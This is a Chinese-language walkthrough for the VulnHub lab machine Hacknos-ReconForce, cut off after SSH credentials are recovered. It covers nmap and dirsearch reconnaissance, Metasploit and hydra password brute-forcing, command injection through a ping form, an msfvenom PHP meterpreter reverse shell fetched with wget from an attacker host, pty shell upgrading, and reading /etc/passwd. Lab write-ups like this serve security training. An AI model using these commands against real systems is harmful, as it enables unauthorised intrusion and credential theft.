Hacknos-ReconForce靶机

靶机地址：https://www.vulnhub.com/entry/hacknos-reconforce,416/

一、信息收集

步骤一：导入并配置靶机为桥接模式而后开启...获取其MAC地址信息...如下：

步骤二：主机发现

nmap 192.168.7.0/24

对应靶机的MAC地址得到IP为192.168.7.20

步骤三：端口扫描

nmap -sV  -p- 192.168.7.20

步骤三：访问网站http://192.168.7.20/

步骤四：目录扫描

dirsearch -u http://192.168.7.20/

没有发现什么有用的信息，那就只能先尝试看看页面有什么重要的功能点吧!

步骤五：点击TroubleShoot会弹出来一个FTP登录框

步骤六：使用MSF进行登录爆破，需要将“Security@hackNos”添加到字典文件中...爆破成功....

加入msf密码字典：
/usr/share/metasploit-framework/data/wordlists/http_default_pass.txt

msfconsole
use auxiliary/scanner/http/http_login
show options	# 获知密码的字典位置，把“Security@hackNos”加入到密码字典中
set AUTH_URI /5ecure/
set STOP_ON_SUCCESS true
set RHOSTS 192.168.1.93
run

步骤七：根据以上爆破结果得出账户与密码admin:Security@hackNos在网页中尝试登录

步骤八：看到有一个ping扫描，那先输入www.baidu.com试一下，看看可否ping通

发现ping通了，并且额外发现了一个文件out.php，并且我发现它和pikachu靶场命令执行漏洞分外相似...于是试着输入www.baidu.com|ls并进行抓包

步骤九：查看out.php文件中发现过滤规则...

二、反弹shell

步骤十：使用kali生成恶意文件

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.7.250 lport=4455 -f raw > shell.php

在目标主机下载恶意文件

wget+http%3a//192.168.7.250:8000/shell.php

下载成功后再在攻击机开启一个web服务

python3 -m http.server

 开启MSF监听模块

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.7.250
set lport 4455
run

监听设置成功后，在浏览器中访问shell.php

反弹成功

切换shell（获取交互式shell）

shell
python3 -c 'import pty;pty.spawn("/bin/bash")'

ls -al /home
ls -al /home/recon
cat /home/recon/user.txt

查看/etc/passwd

发现新用户recon；使用Hydra对SSH服务进行暴力破解...得出用户密码recon:Security@hackNos在Shell中进行用户身份切换或登录..

hydra -l recon -P /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt ssh://192.168.7.20

得到账号密码login: recon password: Security@hackNos